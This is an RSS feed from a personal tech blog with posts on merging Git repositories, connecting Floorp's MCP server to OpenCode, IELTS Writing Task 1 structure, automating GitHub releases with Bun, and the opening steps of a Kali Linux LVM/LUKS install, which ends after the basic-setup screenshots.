<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>UmmIt Kin Personal website</title><description>The place where I share my thoughts and projects.</description><link>https://ummit.dev/</link><item><title>How to Merge Git Repositories While Preserving History</title><link>https://ummit.dev//posts/linux/tools/git/git-merge-repositories/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/git/git-merge-repositories/</guid><description>A guide to merging Git repositories using remote merge and subtree merge, keeping complete commit history intact.</description><pubDate>Thu, 19 Mar 2026 00:00:00 GMT</pubDate><content:encoded>## Introduction

If you manage multiple Git repositories and want to consolidate them into a single repository, you need to choose the right merge strategy.

This guide covers two main approaches:

- **Remote merge** for flat merging at the root level
- **Subtree merge** for organizing repos into subdirectories

Both methods preserve complete commit history, but they are suited for different use cases.

## Why Merge Repositories?

There are several reasons to merge repositories:

- consolidating related projects into a monorepo
- reorganizing code for better maintainability
- preserving historical context for future development
- reducing the overhead of managing multiple repos

## Requirements

Before starting, make sure:

- you have Git installed
- you have access to both source and target repositories
- you have backed up your repositories before attempting any merge

A backup can be as simple as:

```bash
git clone /path/to/repo /path/to/repo-backup
```

## Method 1: Remote Merge (Flat Structure)

This method merges two repositories at the root level.

The result is a single branch with both histories combined.

### When to Use Remote Merge

Use this method when:

- both repositories contain different files with minimal overlap
- you want a flat directory structure
- the repositories represent different aspects of the same project

### How Remote Merge Works

```bash
# In the target repository
cd /path/to/target-repo

# Add source repo as a remote
git remote add source-repo /path/to/source-repo

# Fetch commits from source
git fetch source-repo

# Merge with allow-unrelated-histories flag
git merge source-repo/master --allow-unrelated-histories -m &quot;merge: add source repo&quot;

# Clean up the remote
git remote remove source-repo
```

### Why `--allow-unrelated-histories`

By default, Git refuses to merge repositories with no common ancestor.

The `--allow-unrelated-histories` flag tells Git to proceed anyway.

This is safe when you intentionally want to combine two independent repos.
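
The behavior can be reproduced end to end in a pair of throwaway repos (the /tmp paths and commit messages below are illustrative; identity is set inline so the sketch runs in a clean environment):

```bash
# Two fresh repos with no shared ancestor (illustrative /tmp paths)
rm -rf /tmp/demo-a /tmp/demo-b
git init -q /tmp/demo-a
git -C /tmp/demo-a -c user.name=demo -c user.email=demo@example.com \
  commit -q --allow-empty -m init-a
git init -q /tmp/demo-b
git -C /tmp/demo-b -c user.name=demo -c user.email=demo@example.com \
  commit -q --allow-empty -m init-b

cd /tmp/demo-b
# Fetching HEAD avoids guessing whether the branch is main or master
git fetch -q /tmp/demo-a HEAD

# Without the flag, Git aborts:
# fatal: refusing to merge unrelated histories
git merge FETCH_HEAD || true

# With the flag, the merge goes through
git -c user.name=demo -c user.email=demo@example.com \
  merge FETCH_HEAD --allow-unrelated-histories -m merge-combine
```

After the second merge, `git rev-list --count HEAD` reports three commits: both roots plus the merge commit.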

### Handling Conflicts

If both repositories have files with the same name, Git will report a conflict.

You need to choose which version to keep:

```bash
# Use the version from the source repo
git checkout --theirs conflicting-file.md

# Use the version from the target repo
git checkout --ours conflicting-file.md

# Stage the resolved file
git add conflicting-file.md

# Complete the merge
git commit
```

### Example: Merging a build-scripts repo into a project repo

Suppose you have:

- `project-repo` with application code
- `build-scripts` with CI/CD configuration

You can merge `build-scripts` into `project-repo`:

```bash
cd ~/repos/project-repo

git remote add build /home/user/repos/build-scripts
git fetch build
git merge build/main --allow-unrelated-histories -m &quot;merge: add build scripts&quot;

# If there is a conflict in README.md
git checkout --theirs README.md
git add README.md
git commit -m &quot;merge: add build scripts&quot;

git remote remove build
```

Result:

```text
*   a1b2c3d merge: add build scripts
|\
| * e4f5g6h docs: update build instructions
| * h7i8j9k feat: add Docker build
* k0l1m2n feat: add user authentication
* n3o4p5q fix: resolve login bug
```

Both histories are preserved and merged at a single point.

## Method 2: Subtree Merge (Directory Structure)

This method imports a repository into a subdirectory.

It keeps the imported repo organized and separated from the main repo content.

### When to Use Subtree Merge

Use this method when:

- you want to maintain a clear directory structure
- the imported repo represents a sub-project or module
- you need to organize multiple repos under different paths

### How Subtree Merge Works (Without Squashing)

```bash
# In the target repository
cd /path/to/target-repo

# Add repo as a subtree under a specific path
git subtree add --prefix=&quot;libs/module-name&quot; /path/to/source-repo main
```

This preserves all individual commits from the source repo.

### How Subtree Merge Works (With Squashing)

```bash
# Add repo as a subtree with squashed history
git subtree add --prefix=&quot;libs/module-name&quot; /path/to/source-repo main --squash
```

This condenses the entire history into a single commit.

### With or Without Squashing?

| Aspect | Without `--squash` | With `--squash` |
|--------|-------------------|----------------|
| Commit count | Full history preserved | Single commit |
| Use case | Important history | Large external libs |
| Clarity | Detailed timeline | Clean summary |

Use squashing when:

- importing third-party libraries
- the commit history is not relevant
- you want to keep the main branch clean

Skip squashing when:

- the commits contain valuable context
- you need to trace bug fixes or features
- the repo is part of active development

### Example: Organizing multiple repos into a monorepo

Suppose you have:

- `web-app` with frontend code
- `api-server` with backend code
- `shared-utils` with common utilities

You want to organize them under a single `monorepo`:

```bash
cd ~/repos/monorepo

# Add frontend under packages/frontend
git subtree add --prefix=&quot;packages/frontend&quot; ~/repos/web-app main

# Add backend under packages/backend
git subtree add --prefix=&quot;packages/backend&quot; ~/repos/api-server main

# Add utilities under packages/utils with squashed history
git subtree add --prefix=&quot;packages/utils&quot; ~/repos/shared-utils main --squash
```

Result:

```text
monorepo/
├── packages/
│   ├── frontend/  (full commit history from web-app)
│   ├── backend/   (full commit history from api-server)
│   └── utils/     (single squashed commit from shared-utils)
```

The commit graph shows separate branches for each subtree:

```text
*   x9y8z7 Add &apos;packages/utils/&apos; from commit &apos;a1b2c3&apos;
|\
| * a1b2c3 Squashed &apos;packages/utils/&apos; content
*   w6v5u4 Add &apos;packages/backend/&apos; from commit &apos;t3s2r1&apos;
|\
| * t3s2r1 feat: add user routes
| * q0p9o8 fix: database connection
*   n7m6l5 Add &apos;packages/frontend/&apos; from commit &apos;k4j3i2&apos;
|\
| * k4j3i2 feat: add login page
| * h1g0f9 feat: setup React app
* e8d7c6 docs: initial monorepo setup
```

## Moving Files After Subtree Merge

After importing a repo with subtree, you may want to reorganize files.

Use `git mv` to preserve history:

```bash
# Remove old version if it exists
git rm old-location/file.txt

# Move files with git mv
git mv source-dir/file.txt target-dir/file.txt

# Move all files in a directory
for item in source-dir/*; do
  git mv &quot;$item&quot; target-dir/
done

# Remove empty directory
rmdir source-dir

# Commit the reorganization
git commit -m &quot;refactor: reorganize project structure&quot;
```

## Using Remote URLs Instead of Local Paths

All examples above use local paths, but you can also use remote URLs:

```bash
# Remote merge with GitHub URL
git remote add source git@github.com:username/repo.git
git fetch source
git merge source/main --allow-unrelated-histories

# Subtree merge with GitHub URL
git subtree add --prefix=&quot;vendor/lib&quot; git@github.com:username/lib.git main
```

If you encounter authentication issues with HTTPS, use SSH instead:

```bash
# HTTPS (may prompt for credentials)
https://github.com/username/repo.git

# SSH (uses SSH keys)
git@github.com:username/repo.git
```

## Comparison Table

| Feature | Remote Merge | Subtree (No Squash) | Subtree (Squashed) |
|---------|--------------|---------------------|-------------------|
| Directory structure | Flat (root) | Organized (subdir) | Organized (subdir) |
| Commit history | Full, interleaved | Full, separate | Single commit |
| Best for | Combining similar projects | Importing modules | Importing large libs |
| Complexity | Simple | Moderate | Simple |

## Troubleshooting

### Error: refusing to merge unrelated histories

Add `--allow-unrelated-histories`:

```bash
git merge source/main --allow-unrelated-histories
```

### Error: Authentication failed

Use SSH instead of HTTPS:

```bash
git remote set-url origin git@github.com:user/repo.git
```

### Conflict in binary files

Choose one version explicitly:

```bash
git checkout --theirs file.pdf
git add file.pdf
git commit
```

### Subtree command not found

Make sure you are using a recent version of Git:

```bash
git --version
```

`git subtree` is available in Git 1.7.11+.

## Best Practices

Before merging repositories, follow these best practices:

- **Always backup first** using `git clone`
- **Test locally** before pushing to remote
- **Use descriptive commit messages** explaining why you merged
- **Clean up temporary remotes** after merging
- **Document the merge** in your project README

Example cleanup:

```bash
git remote remove temp-remote
```

Example commit message:

```bash
git commit -m &quot;merge: consolidate frontend and backend repos for easier maintenance&quot;
```

## Conclusion

Merging Git repositories while preserving history is straightforward once you understand the two main methods:

- **Remote merge** combines repos at the root level
- **Subtree merge** organizes repos into subdirectories

Choose the method based on your project structure and whether individual commit history matters.

Always test merges locally first, handle conflicts carefully, and document the reasoning behind your merge decisions.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>How to use Floorp MCP Server with OpenCode</title><link>https://ummit.dev//posts/others/floorp-mcp-server-with-opencode/</link><guid isPermaLink="true">https://ummit.dev//posts/others/floorp-mcp-server-with-opencode/</guid><description>A quick guide to connect Floorp browser automation to OpenCode with a local MCP server using bunx.</description><pubDate>Tue, 17 Mar 2026 00:00:00 GMT</pubDate><content:encoded>## Introduction

If you are using [OpenCode](https://opencode.ai/) and want your coding agent to interact with the [Floorp browser](https://floorp.app/), you can connect them through the `floorp-mcp-server` package.

This MCP server is from the official Floorp project and is published in the [Floorp-Projects/floorp-mcp-server](https://github.com/Floorp-Projects/floorp-mcp-server) repository.

This setup allows OpenCode to use Floorp as an MCP tool for tasks such as listing tabs, reading page content, opening new tabs, navigating pages, and performing basic browser automation.

In this guide, I will show the exact setup I used with `bunx`.

## Requirements

Before starting, make sure you have:

- [Bun](https://bun.sh/) installed
- [Floorp](https://floorp.app/) installed
- OpenCode installed and working
- Floorp running before you try to use the MCP server

You also need to enable Floorp MCP support manually.

## Enable MCP inside Floorp

Open Floorp and go to:

```text
about:config
```

Then search for:

```text
floorp.mcp.enabled
```

Set it to:

```text
true
```

Without this option enabled, OpenCode will not be able to talk to Floorp even if the MCP server is configured correctly.

## OpenCode config location

For a global user-wide setup, OpenCode reads its config from:

```text
~/.config/opencode/opencode.json
```

You can also use a project-level `opencode.json`, but for a browser MCP like this, a global config usually makes more sense.

## Add Floorp MCP server to OpenCode

Edit your OpenCode config file and add the following:

```json
{
  &quot;$schema&quot;: &quot;https://opencode.ai/config.json&quot;,
  &quot;mcp&quot;: {
    &quot;floorp&quot;: {
      &quot;type&quot;: &quot;local&quot;,
      &quot;command&quot;: [&quot;bunx&quot;, &quot;floorp-mcp-server&quot;],
      &quot;enabled&quot;: true
    }
  }
}
```

### Why this config works

- `type: &quot;local&quot;` tells OpenCode this MCP server should be started as a local process
- `command` must be an array, not a plain string
- `bunx floorp-mcp-server` starts the published MCP package directly without a global install
- `enabled: true` makes the MCP server available when OpenCode starts

## Optional manual test

Before testing it through OpenCode, you can check whether the package starts correctly by running:

```bash
bunx floorp-mcp-server
```

If Floorp is running and MCP is enabled in `about:config`, the server should start normally.

## Restart OpenCode

After saving the config, restart OpenCode or open a new session.

Once loaded correctly, OpenCode should be able to access Floorp tools for actions such as:

- listing open tabs
- reading the current page
- opening a new tab
- navigating to another URL
- clicking elements on a page

## Use `/mcp` to list all MCP servers

If you want to quickly check whether OpenCode has loaded your MCP configuration, use the `/mcp` command inside OpenCode.

```text
/mcp
```

This lists the MCP servers available in the current session. If everything is configured correctly, you should see `floorp` in the list.

This is useful to confirm that:

- OpenCode read your config file successfully
- the MCP server is enabled
- the `floorp` MCP server is available to the current agent

![floorp connected](connected.png)

## Example prompt

You can test it with a simple prompt like this:

```text
Can you see my Floorp tabs? Use floorp.
```

Or:

```text
Open a new tab in Floorp and go to https://example.com. Use floorp.
```

## Troubleshooting

If it does not work, check these items first:

- Floorp is already running
- `floorp.mcp.enabled` is set to `true`
- `bunx floorp-mcp-server` can start without errors
- your OpenCode config is saved in `~/.config/opencode/opencode.json`
- the JSON syntax is valid

## Conclusion

That is all you need to connect Floorp MCP Server to OpenCode.

Using `bunx` keeps the setup simple, and once it is configured properly, OpenCode can directly interact with your browser through Floorp&apos;s MCP bridge.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>IELTS Writing 1 — 4 Paragraph Guide</title><link>https://ummit.dev//posts/others/ielts/</link><guid isPermaLink="true">https://ummit.dev//posts/others/ielts/</guid><description>IELTS writing task.</description><pubDate>Sun, 01 Mar 2026 00:00:00 GMT</pubDate><content:encoded># Paragraph 1 — Introduction

Purpose:

- What is it? One sentence that introduces the chart to the reader.
- Rewrite the chart title in one sentence.
- Important: Do not copy the title word-for-word. Keep this one sentence short.

## Point

- Never copy the title directly — rewrite it in your own words
- Use verbs like shows / illustrates / presents
- Use &quot;broken down by&quot; for categories
- Use &quot;in&quot; for years/locations, &quot;from ___ to ___&quot; for time ranges
- Keep it to one clean sentence

## Chart Type Vocabulary

- bar chart
- line graph
- pie chart
- table
- diagram

## Key Term Usage

| Term / Phrase | Use | Example |
|---|---|---|
| shows / illustrates / presents | Use to paraphrase the title | &quot;The chart shows sales by month.&quot; |
| broken down by / by / across | Use to say categories | &quot;broken down by age group&quot; |
| in / in the / for | Use to say time or place | &quot;in 2022&quot;, &quot;for the UK&quot; |

## The Formula

&gt; [Chart type] + [verb] + [what] + [broken down by category] + [time period/location]

## Starting the paragraph

- Overall, it is clear that...
- Overall, it is evident that...
- In general, it can be seen that...

Template:
&gt; The [chart type] shows/illustrates [what], broken down by [category], for/from [time period/location].

Example 1:
&gt; The bar chart shows the average weekly hours spent on exercise by men and women in three age groups in the UK in 2022.

Example 2:
&gt; The bar chart illustrates the proportion of household spending, broken down by food, rent, and leisure, in France, in 2018.

## Word-Boosting Templates — Intro

These longer openers help you hit the word count while still paraphrasing:

- Looking at the [chart type], we can see how much [subject] spent on [list of items] back in [year].
- The [chart type] gives information about the amount of [what] across [categories] in [location] in [year].
- The given [chart type] compares [what] between [group A] and [group B] in [year].

Example:
&gt; Looking at the bar chart, we can see how much people in France and the UK spent on five different items — cars, computers, books, perfume, and cameras — back in 2010.

# Paragraph 2 — Overview (2–3 sentences)

Purpose: Give the big picture: the main trends, the major points, what changed most. NO numbers.

Important: No numbers here. Only big patterns and comparisons.

## Describing trends

- ... is significantly higher than...
- ... is considerably lower than...
- ... remains relatively stable...
- ... fluctuates throughout...
- ... experiences a steady increase/decrease...
- ... reaches its peak in...
- ... hits its lowest point in...

## Comparing two things

- ... whereas ...
- ... while ...
- ... in contrast, ...
- However, ...
- On the other hand, ...

## Describing similarity

- Both ... and ... show/experience...
- Similarly, ...
- ... follows a similar pattern to ...

## Useful adjectives (no numbers!)

- significant / considerable
- slight / marginal
- steady / gradual
- dramatic / sharp
- overall / general
- frequent

Template:
&gt; Overall, it is clear that [main trend]. Additionally / However, [second trend or comparison].

Example:
&gt; Overall, it is clear that men exercise more than women across all age groups. Additionally, activity falls with age for both sexes.

## Key Term Usage
| Term / Phrase | Use | Example |
|---|---|---|
| Overall, it is clear that... | Start the overview | &quot;Overall, it is clear that demand rose.&quot; |
| It is noticeable that... | Point to main idea | &quot;It is noticeable that urban areas grew.&quot; |
| The main trend is... | Say the biggest trend | &quot;The main trend is a steady increase.&quot; |
| remains relatively stable | Use for little change | &quot;Prices remain relatively stable.&quot; |

## Word-Boosting Templates — Overview

These phrases add natural length to your overview without using numbers:

- [Subject A] generally outspent / outperformed [Subject B] in [X] out of the [Y] areas.
- Both [groups] put the biggest slice of their [budget/time] toward [item].
- [Subject A] spent about [amount], while [Subject B] followed closely at around [amount].
- The only exception was [item], where [Subject B] actually [verb] more than [Subject A].
- From what can be seen in the data, ...

Example:
&gt; The UK generally outspent France in four out of the five areas. Both countries put the biggest slice of their budget toward cars.

### Example - Social Media Chart

- Teenagers use much more than adults
- Both groups use more on weekends
- Teenagers nearly double adults

# Paragraphs 3 &amp; 4 — Details (3–4 sentences each)

Purpose: Give specific numbers, units, and comparisons. Split the data into two small groups (group A and group B) and describe each in turn.

What are they? These are where you describe the specific data and numbers from the chart.

- Para 3 = first subject / most notable data (e.g. the highest, the biggest trend)
- Para 4 = second subject / remaining data (e.g. the lowest, the other category)

Important: Always write the unit (%, $, hours). Check numbers carefully.

Template — Para 3:
&gt; In [group/time], [subject] stood at [number][unit]. This figure then [rose/fell] to [number] for [next group], and [declined/increased] to [number].

Template — Para 4:
&gt; By comparison / Meanwhile, [subject 2] stood at [number][unit] in [group/time]. This figure [dropped/rose] to [number] for [next group], and [fell/increased] further to [number].

Example:
&gt; In the 18–30 group, men exercised 8 hours per week. This fell to 5 hours for 31–50 year olds and to 3 hours for those 51 and over.
&gt; By comparison, women aged 18–30 exercised 6 hours per week. This dropped to 4 hours for 31–50 year olds and to 2 hours for those 51 and over.

## Key Term Table — Paragraphs 3 &amp; 4

### Introducing data

- In [year/month]...
- At its peak...
- At its lowest point...

### Describing numbers

- stood at... (e.g. &quot;rainfall stood at 80mm&quot;)
- accounted for...
- represented...
- reached approximately...

### Showing change

- increased / rose / climbed by [amount]
- decreased / fell / dropped by [amount]
- increased / rose to [number]
- remained stable at...

### Linking between points

- Meanwhile, ...
- In contrast, ...
- By comparison, ...
- Following this, ...
- Subsequently, ...
- Interestingly, ...

## Word-Boosting Templates — Details

These phrases add natural length and variety to your detail paragraphs:

### Highlighting a gap

- The most striking gap between the two [subjects] showed up in [item].
- The biggest difference can be seen in [item], where [A] [verb] more than double that of [B].

### Approximate values

- [Subject] hit nearly [amount] in this category.
- [Subject] stayed around [amount].
- ... coming in at [amount] compared to just [amount].
- ... which was roughly / approximately / nearly [amount].

### Exceptions &amp; contrast

- Interestingly, [item] was the only area where [B] actually [verb] more than [A].
- [Subject] clearly had a stronger preference for [item].

### Wrapping up a paragraph

- To wrap things up, ...
- Looking at the remaining categories, ...
- As for the other items, ...
- In terms of the remaining categories, ...

### &quot;while&quot; to compare in one sentence

- [A] spent [amount] on [item], while [B] only spent [amount].
- [A] [verb] [amount], while [B] followed closely at around [amount].

Example:
&gt; Interestingly, computers were the only area where the French actually spent more than British consumers. French buyers hit nearly £380,000 in this category, while British consumers stayed around £350,000. The most striking gap between the two nations showed up in camera sales — British consumers spent more than double that of the French, coming in at £360,000 compared to just £150,000.

## Key Term Usage — Paragraphs 3 &amp; 4

| Term / Phrase | Use | Example |
|---|---|---|
| stood at / was recorded at | Start a specific value | &quot;Exports stood at 50%.&quot; |
| rose / increased / climbed | Show increase | &quot;Sales rose to 200 units.&quot; |
| fell / decreased / dropped | Show decrease | &quot;Profit fell to $5,000.&quot; |
| remained stable / levelled off | No big change | &quot;The rate remained stable at 10%.&quot; |
| peaked at / reached its peak | Highest value | &quot;The figure peaked at 80%.&quot; |
| meanwhile / by comparison / in contrast | Compare groups | &quot;Meanwhile, women showed lower rates.&quot; |
| slightly less/more than | Small difference | &quot;6 hours, slightly less than men.&quot; |
| significantly higher/lower than | Big difference | &quot;is significantly higher than...&quot; |
| stood at X / accounted for X / reached X | Number phrases | &quot;stood at 30%, accounted for 20%&quot; |

## &quot;by&quot; vs &quot;to&quot;

**&quot;by&quot;** = the change amount
&gt; &quot;Rainfall increased **by** 20mm&quot; (it went up 20mm)

**&quot;to&quot;** = the final number
&gt; &quot;Rainfall increased **to** 80mm&quot; (it ended at 80mm)

Example:
&gt; &quot;In January, London&apos;s rainfall stood at 80mm, which was significantly higher than Paris at 45mm. London&apos;s rainfall subsequently rose to its peak of 120mm in November, an increase of 40mm from October.&quot;

### &quot;by&quot; vs &quot;to&quot; — Key Term Card

| | by | to |
|---|---|---|
| Means | the change amount | the final number |
| Question | &quot;how much?&quot; | &quot;how many now?&quot; |
| Example | rose by 50 units | rose to 200 units |
| Combined | rose by 50 units to 200 units | |


## Full Detail Paragraph Key Terms

### Introduce the number

- stood at...
- accounted for...
- reached...
- was recorded at...

### Going UP

- increased / rose / climbed / jumped by... to...

### Going DOWN

- decreased / fell / dropped / declined by... to...

### Staying same

- remained stable at...
- stayed constant at...

### Linking sentences

- Meanwhile, ...
- In contrast, ...
- By comparison, ...
- Following this, ...
- Subsequently, ...

# Short Checklist

- Minimum 150 words (aim 160–170).
- P1: paraphrase only (1 sentence).
- P2: big picture only — no numbers.
- P3 &amp; 4: use numbers, units and comparisons.
- Group similar data together. Do not list every number.
- Use a mix of short and long sentences.
- Leave 2–3 minutes to check numbers, units and grammar.

# Full 4-paragraph Sample Answers

## Sample 1 — Exercise by Age Group

Intro:
&gt; The bar chart shows the average hours of exercise per week by men and women in three age groups in the UK in 2022.

Overview:
&gt; Overall, men exercise more than women in all age groups. Activity falls with age for both sexes.

Details 1:
&gt; In the 18–30 group, men exercised 8 hours per week. This fell to 5 hours for 31–50 year olds and to 3 hours for those 51 and over.

Details 2:
&gt; By comparison, women aged 18–30 exercised 6 hours per week. This dropped to 4 hours for 31–50 year olds and to 2 hours for those 51 and over.

## Sample 2 — France vs UK Consumer Spending

Intro:
&gt; Looking at the bar chart, we can see how much people in France and the UK spent on five different items — cars, computers, books, perfume, and cameras — back in 2010.

Overview:
&gt; From what can be seen in the data, the UK generally outspent France in four out of the five areas. Both countries put the biggest slice of their budget toward cars. The UK spent about £450,000 on them, while France followed closely at around £400,000.

Details 1:
&gt; Interestingly, computers were the only area where the French actually spent more than people in the UK. France hit nearly £380,000 in this category, while the UK stayed around £350,000. The most striking gap between the two nations showed up in camera sales. In that market, the UK spent more than double what France did, coming in at £360,000 compared to just £150,000.

Details 2:
&gt; To wrap things up, even though the UK spent more on books, France clearly had a stronger preference for perfume. They spent £200,000 on it, while the UK only spent £140,000.

## Sample 3 — Exercise by Age Group (Extended Version)

Intro:
&gt; The bar chart illustrates the average hours per week spent on exercise, broken down by men and women across three age groups, in the UK in 2022.

Overview:
&gt; Overall, it is evident that men exercise significantly more than women across all age groups. Additionally, the 18–30 age group shows the highest levels of physical activity, while older age groups tend to exercise less.

Details 1 (men):
&gt; In the 18–30 age group, men&apos;s exercise hours stood at 8 hours per week, representing the highest figure across all groups. This subsequently fell to 5 hours among 31–50 year olds, a decrease of 3 hours. This declined further to just 3 hours for those aged 51 and over, making it the lowest recorded figure for men.

Details 2 (women):
&gt; Meanwhile, women in the 18–30 age group stood at 6 hours per week, slightly lower than their male counterparts. This subsequently fell to 4 hours among 31–50 year olds. This declined further to only 2 hours for those aged 51 and over, the lowest figure overall across both genders.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Automated GitHub Releases with Bun, Bumpp, and Changelogithub</title><link>https://ummit.dev//posts/web/bun-package-manager/bun-for-git-release/</link><guid isPermaLink="true">https://ummit.dev//posts/web/bun-package-manager/bun-for-git-release/</guid><description>Automate version bumping and GitHub release creation with changelog generation using Bun, bumpp, and changelogithub.</description><pubDate>Fri, 16 Jan 2026 00:00:00 GMT</pubDate><content:encoded>## Introduction

Ever wanted to automate your GitHub releases with auto-generated changelogs based on your commit messages? With **Bun**, **bumpp**, and **changelogithub**, you can create professional releases in seconds, with no manual changelog writing required!

## Prerequisites

Before getting started, make sure you have the following tools:

- [Bun](https://bun.sh/) — A fast JavaScript runtime
- [bumpp](https://github.com/antfu/bumpp) — Interactive version bumping
- [changelogithub](https://github.com/antfu/changelogithub) — GitHub release notes generator

Install bumpp as a dev dependency:

```bash
bun add -D bumpp
```

## Setup

Add a release script to your `package.json`:

```json
{
  &quot;scripts&quot;: {
    &quot;release&quot;: &quot;bumpp&quot;
  }
}
```

## Step 1: Bump the Version and Create a Tag

Run the release command:

```bash
bun run release
```

You&apos;ll see an interactive prompt like this:

```
✔ Current version 1.4.1 ›         patch 1.4.2

   files package.json
  commit chore: release v1.4.2
     tag v1.4.2
    push yes

    from 1.4.1
      to 1.4.2

✔ Bump? … yes
✔ Git commit
✔ Git tag
✔ Git push
```

This will:

1. Update the version in `package.json`
2. Create a git commit with message `chore: release vX.X.X`
3. Create a git tag `vX.X.X`
4. Push everything to your remote repository

## Step 2: Generate the Changelog

Now, let&apos;s generate the changelog and create a GitHub release:

```bash
bunx changelogithub
```

### Error 1: No Previous Tag to Compare

If this is your **first release**, you&apos;ll likely encounter this error:

```
fatal: ambiguous argument &apos;c46318bd...v1.4.2&apos;: unknown revision or path not in the working tree.
```

**Why does this happen?**

This error occurs because `changelogithub` tries to compare the current tag with the previous tag to generate a changelog. Since this is your first release, there&apos;s no previous tag to compare against.

**Solution:** Manually specify the starting commit using the `--from` flag:

```bash
bunx changelogithub --from c46318b
```

To find your initial commit hash:

```bash
git log --oneline | tail -1
```
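
As an alternative to scanning `git log` by hand, `git rev-list --max-parents=0 HEAD` prints the root commit directly. A sketch in a throwaway repo (illustrative path and commit messages):

```bash
# Demo repo; in practice run the rev-list line inside your project
rm -rf /tmp/rel-demo
git init -q /tmp/rel-demo
git -C /tmp/rel-demo -c user.name=demo -c user.email=demo@example.com \
  commit -q --allow-empty -m chore-init
git -C /tmp/rel-demo -c user.name=demo -c user.email=demo@example.com \
  commit -q --allow-empty -m feat-x

# The root commit is what --from expects on a first release
git -C /tmp/rel-demo rev-list --max-parents=0 HEAD
```

Inside your real project, `bunx changelogithub --from $(git rev-list --max-parents=0 HEAD)` then picks up the first commit automatically.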

### Error 2: No GitHub Token Found

After fixing the first error, you might encounter this:

```
No GitHub token found, specify it via GITHUB_TOKEN env. Release skipped.
```

**Why does this happen?**

Since we&apos;re running `changelogithub` locally (without GitHub Actions), it needs a GitHub token to authenticate and create the release on your behalf.

**Solution:** Create and export a GitHub Personal Access Token.

#### How to Get a GitHub Token

1. Go to **GitHub** → **Settings** → **Developer settings** → **Personal access tokens** → **Tokens (classic)**
2. Click **&quot;Generate new token (classic)&quot;**
3. Give it a name (e.g., `changelogithub`)
4. Select the scope:
   - `public_repo` — for public repositories
   - `repo` — for private repositories
5. Click **&quot;Generate token&quot;** and copy it

#### Export the Token

Add the token to your current shell session:

```bash
export GITHUB_TOKEN=ghp_xxxxxxxxxxxxxxxxxxxx
```

&gt; **Tip:** Add this line to your `~/.zshrc` or `~/.bashrc` for permanent access.

## Now Run Again!

Now run the command again with both fixes:

```bash
bunx changelogithub --from c46318b
```

You should see output like this:

```
changelogithub v14.0.0
c46318b -&gt; v1.4.2 (224 commits)
--------------

### 🚨 Breaking Changes
- Update package manager to use bun or bunx

### 🚀 Features
- Add Friends page
- Add Gear page
- **OG-Image**: Add Open Graph image generation

### 🐞 Bug Fixes
- Missing thumbnail
- Correct spelling errors

##### View changes on GitHub

--------------
Creating release notes...
Released on https://github.com/username/repo/releases/tag/v1.4.2
```

Your release is now live on GitHub with a beautifully formatted changelog!

## Automate with GitHub Actions

Want to skip the manual token setup entirely? Use GitHub Actions to automate the entire process!

Create `.github/workflows/release.yml`:

```yaml
name: Release

on:
  push:
    tags:
      - &apos;v*&apos;

jobs:
  release:
    runs-on: ubuntu-latest
    permissions:
      contents: write
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0

      - name: Setup Bun
        uses: oven-sh/setup-bun@v1

      - name: Generate Changelog &amp; Release
        run: bunx changelogithub
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
```

Now your workflow is:

1. Run `bun run release` locally
2. GitHub Actions automatically generates the changelog and creates the release

&gt; **Note:** `secrets.GITHUB_TOKEN` is automatically provided by GitHub Actions — no manual setup required!

---

## Command Reference

| Command | Purpose |
|---------|---------|
| `bun run release` | Bump version, commit, tag, and push |
| `bunx changelogithub` | Generate changelog and create GitHub release |
| `bunx changelogithub --from &lt;commit&gt;` | First release (specify starting commit) |
| `bunx changelogithub --dry` | Preview changelog without publishing |

---

## References

- [bumpp](https://github.com/antfu/bumpp) — Version bumping tool by Anthony Fu
- [changelogithub](https://github.com/antfu/changelogithub) — Changelog generator by Anthony Fu
- [Conventional Commits](https://www.conventionalcommits.org/) — Commit message specification</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Kali Linux with Manual Partitioning, LVM, and LUKS Encryption</title><link>https://ummit.dev//posts/linux/distribution/kali/kali-manualy-lvm-luks-installation-guide/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/distribution/kali/kali-manualy-lvm-luks-installation-guide/</guid><description>Kali Linux with manual LVM partitioning with LVM and LUKS encryption.</description><pubDate>Sun, 02 Feb 2025 00:00:00 GMT</pubDate><content:encoded>## Introduction

This article is a comprehensive guide to installing Kali Linux with manual partitioning, Logical Volume Management (LVM), and LUKS encryption. This is what you’ll see once you complete the installation successfully:

![done](./featured.png)

### What the fuck?

Before I started this guide, I was unsure whether I should write it at all. Using a GUI installer is really easy and doesn’t seem to need a guide. But when I actually tried it, I found the Debian installer quite challenging and hard to use. As Linus Torvalds once put it, `The Debian installer is really hard to use.`

So, I decided to write this guide to help you install Kali Linux with LVM and LUKS encryption.

I did a lot of research on Kali Linux LVM installation with LUKS, but unfortunately, I couldn’t find any articles or guides available online. I had to figure it out on my own. Two weeks ago, I spent a day and a half trying to figure out how to install Kali Linux with LVM and LUKS. Now, I’m sharing my experience with you! :)

## Let’s Get Started

I won’t go through the very basics, like how to download the ISO, create a bootable USB, boot from the USB, or set up a new VM. I’ll start from the boot screen of the Kali Linux installer, and this will be my starting point.

![started](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2025-02-02-200312_hyprshot.png)

## 1. Basic Setup

The basic setup should be pretty easy—just follow the instructions on the screen. You&apos;ll need to configure a few things like the language, location, keyboard layout, network settings, user account, and password. Just take it step by step, and you’ll be good to go!

![Select a language](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/1_basic/1_Select a language.png)

![Select your location](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/1_basic/2_Select your location.png)

![Configure locales](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/1_basic/3_Configure locales.png)

![Configure the keyboard](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/1_basic/4_Configure the keyboard.png)

![Load installer components from installation media](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/1_basic/5_Load installer components from installation media.png)

![Configure the network](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/1_basic/6_Configure the network.png)

